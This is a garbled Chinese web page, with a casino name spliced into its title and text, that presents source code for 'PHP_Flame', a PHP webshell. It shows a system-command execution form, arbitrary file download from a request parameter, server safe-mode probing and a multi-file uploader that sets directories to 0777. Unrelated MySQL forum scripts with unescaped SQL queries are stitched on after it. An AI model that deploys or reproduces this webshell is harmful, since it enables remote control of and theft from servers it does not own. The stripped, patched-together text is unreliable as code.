澳门新葡萄京娱乐场基于mysql的论坛(1)

IPHP_Flame (Version: Progress ) 的一些信息: *修正了无法下载文件的BUG
*修正了无法返回上级的BUG *修正了代码编辑出现错误的BUG ……
*增加PHPINFO的功能 *增加多文件下载的功能 *增加执行系统命令的功能
*增加代码查看功能 *增加服务器安全探测功能 …….
*澳门新葡萄京娱乐场,还有许多美化工作。。。。。。 相关的资料:
1。修正了无法返回上级的BUG的代码: echo “a
href=/”$php_self?act=dir&dir=$dir/../”返回上级/a”;
2。修正了无法下载文件的相关代码: case “download”: if
(!@is_file($_GET[‘file_name’])) echo”你要下的文件不存在”; $filename
= basename($_GET[‘file_name’]); $filename_info = explode(‘.’,
$filename); $fileext = $filename_info[count($filename_info)-1];
header(‘Content-type: application/x-‘.$fileext);
header(‘Content-Disposition: attachment; filename=’.$filename);
header(‘Content-Description: PHP3 Generated Data’);
readfile($_GET[‘file_name’]); break; 3。增加代码查看功能 a
href=”?echo$php_self;??actionaa=cmd&method=show_source&cmd=? echo
$_GET[‘file’];?” target=_blank文件代码/a
4。修正了代码编辑出现错误的代码: $tem=
str_replace(“/textarea”,”//textarea”,$tem); 。。。。。 $tem=
str_replace(“//textarea”,”/textarea”,$tem); 5。增加服务器安全探测功能:
if (get_cfg_var(“safe_mode”))echo”onbr”;else echo”offbr”; echo “*
disable_functions:”;$dis_func=get_cfg_var(“disable_functions”); if
($dis_func==””) { echo(“font color=redbno value/b/font”); } else {
$dis_func=str_replace(” “,”br”,$dis_func);
$dis_func=str_replace(“,”,”br”,$dis_func); echo(“$dis_func”); }
6。执行系统命令部分的代码: ? if ($actionaa==”cmd”) { ? body
bgcolor=”#6595d6″ form name=”form1″ method=”post” action=”?= $PHP_SELF
??actionaa=cmd” select name=”method” option value=”system” ? if
($method==”system”) { echo “selected”; } ?system/option option
value=”passthru” ? if ($method==”passthru”) { echo “selected”; }
?passthru/option option value=”show_source” ? if
($method==”show_source”) { echo “selected”; } ?show_source/option
option value=”opendir” ? if ($method==”opendir”) { echo “selected”; }
?opendir/option option value=”popen” ? if ($method==”popen”) { echo
“selected”; } ?popen/option /selectbr input type=”text” name=”cmd”
size=”40″ value=”?= $cmd; ?” input type=”submit” name=”Submit”
value=”?=$method?” br /form ? if (!$method) { $method=”system”; } if
(!$cmd) { echo “* JSW’S PHP FLAMEbr”; echo “* Author: JSWbr”; echo “*
safe_mode:”;if (get_cfg_var(“safe_mode”))echo”onbr”;else
echo”offbr”; echo “*
disable_functions:”;$dis_func=get_cfg_var(“disable_functions”); if
($dis_func==””) { echo(“font color=redbno value/b/font”); } else {
$dis_func=str_replace(” “,”br”,$dis_func);
$dis_func=str_replace(“,”,”br”,$dis_func); echo(“$dis_func”); } echo
“br* Now please choose a function and enter the command……”; } echo
“brpre”; if ($method==”system”) { system(“$cmd 2&1″); } if
($method==”passthru”) { passthru(“$cmd 2&1″); } if ($method==”opendir”)
{ $h=opendir($cmd); while($file=readdir($h)) { echo “$file/n”; } } if
($method==”show_source”) { if (show_source($cmd)) { //echo “pre”;
//echo show_source($file); //echo “/pre”; } else { echo “script
alert(/”unable to read file: $file using: show_source/”); /script”; } }
if ($method==”popen”) { $pp = popen(‘$cmd 2&1’, ‘r’); $read = fread($pp,
2096); echo $read; pclose($pp); } echo “/pre”; exit; } ?
7。增加文件上载的代码: ?php if($dir==””) $dir=”./”; ? ?
if($tools==upload) { for($i=1;$i21;$i++) { $temp1=”userfile”.$i;
$temp2=”userfile”.$i.”_name”; $source=$$temp1; $source_name=$$temp2;
if(@$source!=””) { @$v=file_exists($filedir); if(!$v) {
mkdir(@$filedir,0777); } @chmod($filedir,0777);
if(file_exists(“$filedir/$source_name”)==”1″) { if($up_flag==”y”) {
@unlink($filedir/$source_name);
@copy($source,”$filedir/$source_name”); echo
$source_name.”已覆盖上传br”; } else echo $source_name.”请重新上传!br”;
} else { @copy($source,”$filedir/$source_name”); echo
$source_name.”已上传br”; } } }//end for echo” html head titleJSW’S PHP
FLAME/title meta “Content-Type/” content=/”text/html; charset=gb2312/”
link href=t.css rel=stylesheet type=text/css script
language=/”javascript/” function setid() { str=’br’;
if(!window.uploadForm.upcount.valuewindow.uploadForm.upcount.value20window.uploadForm.upcount.value==0)
window.uploadForm.upcount.value=1;
for(i=1;i=window.uploadForm.upcount.value;i++) str+=’文件’+i+’:input
type=/”file/” name=/”userfile’+i+’/” style=/”width:400/”
class=/”tx1/”brbr’; window.upid.innerHTML=str+’br’; } /script /head body
body bgcolor=/”#6595d6/” table width=/”550/” border=/”1/”
cellspacing=/”0/” cellpadding=/”5/” align=/”center/” form name=/”t/”
method=/”get/” action=/”?/” tr class=/”t2/” tdli
1.指定上传目录(默认为本程序所在目录) input type=/”hidden/”
name=/”tools/” value=/”upload/” input type=/”text/” name=/”dir/” input
type=/”submit/” value=/”确定/” name=/”t/”/td/li /tr /form form
name=/”uploadForm/” method=/”post/” action=/”?tools=upload&dir=$dir/”
enctype=/”multipart/form-data/” tr class=/”t2/” td li
2.需要上传的个数(建议最大值 20) input type=/”text/” name=/”upcount/”
class=/”tx/” value=/”1/” input type=/”button/” name=/”Button/”
class=/”bt/” onclick=/”setid();/” value=/”设定/” /li li
3.全部文件都覆盖上传: input type=/”radio/” name=/”up_flag/”
value=/”y/”是input type=/”radio/” name=/”up_flag/” value=/”n/”
checked否 /li br br 您的文件将被上传到: $dir input type=/”hidden/”
name=/”filedir/” class=/”tx/” value=/”$dir/” a
href=/”?/”返回PHP_Flame/a /td /tr tr td id=/”upid/” height=/”122/”
文件1: input type=/”file/” name=/”userfile1/” style=/”width:400/”
class=/”tx1/” value=/”/” /td /tr tr td input type=/”submit/”
name=/”upload/” value=/”上传/” class=/”bt/” input type=/”reset/”
name=/”reset/” value=/”重执/” class=/”bt/” /td /tr/form /table /body
/html”; exit;} ? 。。。。。。 最后指明的是,这个PHP程序是在安然的PHP
Command的基础上编写的,在此表示感谢,完整代码:

###############################################
此篇文章属原创,如有引用,请标明作者信息。 作者:冷情疯子 Email:
edincur@yeah.net
###############################################
## adduser.php
################################
###############################################
?php require(func.php); if(empty($name) or empty($pwd1)){
show_error(2); $founderr=1; } if (is_user_exits($name)){
show_error(3); $founderr=1; } if ($pwd1$pwd2){ show_error(5);
$founderr=1; } if (strlen($name)16 or strlen($pwd1)16 or
strlen($qm)255){ show_error(6); $founderr=1; } $password=$pwd1; if
(!$founderr){ adduser(); echo 成功!; } ?
###################### ### admin.php
######## ###################### ?php
require func.php; if (adminok()) { ? html head title管理/title meta
content=text/html; charset=gb2312 link rel=stylesheet type=text/css
href=css/index.css /head body bgcolor=#FFFFFF 请选择版面进行操作br
table width=98% border=0 cellspacing=0 cellpadding=0 tr td width=52%
valign=toptable width=98% border=1 cellspacing=0 cellpadding=0
bordercolorlight=#000000 bordercolordark=#FFFFFF tr align=center
bgcolor=#eeeeeetd width=42% height=18Chinesename/td td width=33%
height=18Name/td /tr ?php $sql=select * from boardinfo;
$sql_result=mysql_query($sql); while
($sql_row=mysql_fetch_array($sql_result)) { ? tr align=centertd
width=42%a href=admin.php?board=?php echo $sql_row[name];??php echo
$sql_row[chinesename];?/a/td td width=33%?php echo
$sql_row[name];?/td /tr ?php } ?/table br form name=form5
action=oper.php 英文名称:input type=text name=name size=20 maxlength=30
br 中文名称: input type=text name=chinesename size=20 maxlength=30
input type=hidden name=add_board value=y br input type=submit
name=add_board value=增加版面 /form /td td width=48% valign=top ?php if
(isset($board)){ $sql=select * from boardinfo where name=’$board’;
$sql_result=mysql_query($sql);
$sql_row=mysql_fetch_array($sql_result); $name=$sql_row[name];
$chinesename=$sql_row[chinesename]; ?table width=98% border=1
cellspacing=0 cellpadding=0 bordercolorlight=#FFFFFF
bordercolordark=#CCCCCC tr tdform name=form1 action=oper.php
增加版主:input type=text name=name size=17 maxlength=16 input
type=submit name=add_admin value=增加 input type=hidden name=add_admin
value=y input type=hidden name=board value=?php echo $board? /form /td
/tr tr tdform name=form2 action=oper.php 删除版主:select name=name ?php
$sql=select name from user where slaveboard=’$board’;
$sql_result=mysql_query($sql); while
($sql_row=mysql_fetch_array($sql_result)) { echo option
value=/$sql_row[name]/$sql_row[name]/option; } ? /select input
type=submit name=delete_admin value=删除 input type=hidden
name=delete_admin value=y /form /td /tr tr tdform name=form3
action=oper.php 中文名称input type=text name=chinesename size=17
maxlength=16 value=?php echo $chinesename? br 英文名称 input type=text
name=name size=16 maxlength=40 value=?php echo $name? input type=hidden
name=modify value=y input type=submit name=modify value=更改 /form /td
/tr tr td form name=form4 action=oper.php input type=submit
name=del_board value=删除板块 input type=hidden name=board value=?php
echo $board? input type=hidden name=del_board value=y /form /td /tr tr
td/td /tr tr td/td /tr /table ?php } ? /td /tr /table /body /html ?php }
else { show_error(1); } ?

发表评论

电子邮件地址不会被公开。 必填项已用*标注